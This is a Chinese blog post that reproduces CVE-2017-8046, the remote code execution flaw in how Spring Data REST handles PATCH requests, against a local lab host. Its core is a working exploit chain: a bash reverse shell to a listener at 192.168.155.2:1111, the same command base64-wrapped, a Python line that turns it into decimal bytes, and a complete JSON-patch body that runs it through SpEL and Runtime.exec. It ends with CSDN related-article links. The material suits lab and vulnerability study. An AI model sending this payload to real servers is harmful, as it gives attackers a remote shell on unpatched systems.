Spring Data Rest远程命令执行漏洞复现(CVE-2017-8046)

最新推荐文章于 2023-11-29 20:59:38 发布
最新推荐文章于 2023-11-29 20:59:38 发布
阅读量373 收藏 1
点赞数
文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132789159
版权

一、漏洞说明
Spring Data Rest服务器在处理PATCH请求时存在一个远程代码执行漏洞。攻击者通过构造好的JSON数据来执行任意Java代码
二、影响版本
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
三、搭建环境
在这里插入图片描述在这里插入图片描述

四、漏洞特征
访问以下链接,出现如下界面说明存在漏洞
http://192.168.25.128:8080/customers/1
在这里插入图片描述

五、漏洞复现
1.准备shell命令
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
base64编码后:
bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==
}|{base64,-d}|{bash,-i}
2.编码为十进制
使用python将准备执行的代码编码为十进制
“,”.join(map(str,(map(ord,“bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}”))))
在这里插入图片描述

3.准备请求包
[
{ “op”: “replace”,
“path”: “T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,49,78,83,52,121,76,122,69,120,77,84,69,103,77,68,52,109,77,81,61,61,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125}))/lastname”,
“value”: “vulhub”
}
]
4.抓包改包
在这里插入图片描述

修改方法改为PATCH
将Content-Type指定为application/json-patch+json

5.nc开启监听
在这里插入图片描述

6.发送请求包
在这里插入图片描述

7.反弹shell
在这里插入图片描述

只为了拿0day
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
vulhub中springCVE-2017-8046漏洞复现
最新发布
yougexiaojiuguan的博客
11-29 327
学习过程中的记录,为了方便自己查看
漏洞复现----41、Spring Data Rest 远程命令执行漏洞CVE-2017-8046
七天
06-30 1092
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
Spring Data REST 远程代码执行漏洞CVE-2017-8046)分析与复现
美团技术团队
09-29 4829
前言 2009年9月Spring 3.0 RC1发布后,Spring就引入了SpEL(Spring Expression Language)。对于开发者而言,引入新的工具显然是令人兴奋的,但是对于运维人员,也许是噩耗的开始。类比Struts 2框架,会发现绝大部分的安全漏洞都和ognl脱不了干系。尤其是远程命令执行漏洞,占据了多少甲方乙方工程师的夜晚/周末,这导致Struts 2越...
Spring Data Rest-远程命令执行漏洞CVE-2017-8046
qq_43381463的博客
04-11 443
Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中,path的值被传入`setValue`,导致执行了SpEL表达式,触发远程命令执行漏洞
Spring Data Rest 远程命令执行漏洞 CVE-2017-8046 漏洞复现
ADummy的博客
03-02 226
Spring Data Rest 远程命令执行漏洞CVE-2017-8046) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 ​ 影响版本 Spr
Spring Data Rest 远程命令执行漏洞CVE-2017-8046
EC_Carrot的博客
08-03 466
漏洞简介 Spring Data是一个为数据访问提供基于Spring模型的项目。 Pivotal Spring Data RESTSpring Boot和Spring Data中存在安全漏洞。攻击者可通过发送恶意的PATCH请求利用该漏洞执行任意的Java代码。 影响版本 Pivotal Spring Data REST 2.5.12之前的版本,2.6.7之前的版本,3.0 RC3之前的版本 Spring Boot 2.0.0M4之前版本,Spring Data Kay-RC3之前的版本 漏洞复现 访问h
Spring Data Rest 远程命令执行漏洞复现(CVE-2017-8046)
baidu_38844729的博客
07-06 3065
漏洞分析 漏洞原理: Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码 影响版本: Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3 Spring Boot version < 2.0.0M4 Spring Data release trains < Kay-RC3 漏洞复现 1、启动环境 cd v
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
远程命令执行漏洞
08-10
NULL 博文链接:https://crabdave.iteye.com/blog/2211641
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE)漏洞,被称为CVE-2022-22965,也被称为“Spring4Shell”。这个漏洞对使用Spring Framework的应用程序构成了重大威胁,因为攻击者可以利用它来执行...
Spring Data Rest 远程命令执行漏洞CVE-2017-8046)——漏洞复现
weixin_42090431的博客
11-27 91
(3)添加字段 Content-Type: application/json-patch+json。bash -c {echo,你的编码}|{base64,-d}|{bash,-i}(1)访问 http://靶场ip:8080/customers/1 进行抓包。漏洞验证之前,我们需要将要执行命令进行Ascii转译,不然会执行不成功的.将 touch /tmp/success 进行。(4)将制作好的payload添加到最后一行。(2)转包之后将GET修改为PATCH。新建txt文件 替换空格。
基于QL的安全研究—在Spring Data REST中找到一个远程命令执行(CVE-2017-8046)
一个码农的笔记
10-28 783
翻译自:https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql 翻译:聂心明 在这篇文章中,我将介绍Spring Data REST远程命令执行漏洞并且我将展示如何使用ql帮助保证漏洞得到正确的修复。 漏洞详情 这个漏洞CVE-2017-8046 https://pivotal.io/security/cve-2017-8046 )它通过...
CVE-2017-8046 Spring Data Rest 远程命令执行漏洞复现(最详细版本)
精品博客,你值得一看~
09-17 590
REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞Spring-data-rest服务器在处理PATCH请求时,攻击者可以构造恶意的PATCH请求并发送给spring-date-rest服务器,通过构造好的JSON数据来执行任意Java代码.先cd到spring目录下的CVE-2017-8046里面,然后使用docker-compose启动环境.一切都准备好之后就可以启动CVE-2017-8046 的环境了.
Spring data rest漏洞在IDEA中复现CVE-2017-8046
wxzyyds的博客
11-06 1201
这篇文章主要讲述了spring data restCVE-2017-8046)由于spel表达式没有进行过滤而导致的远程RCE,本片文章利用了IDEA中的动态调试,实现了对于漏洞产生原因的详细复现

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值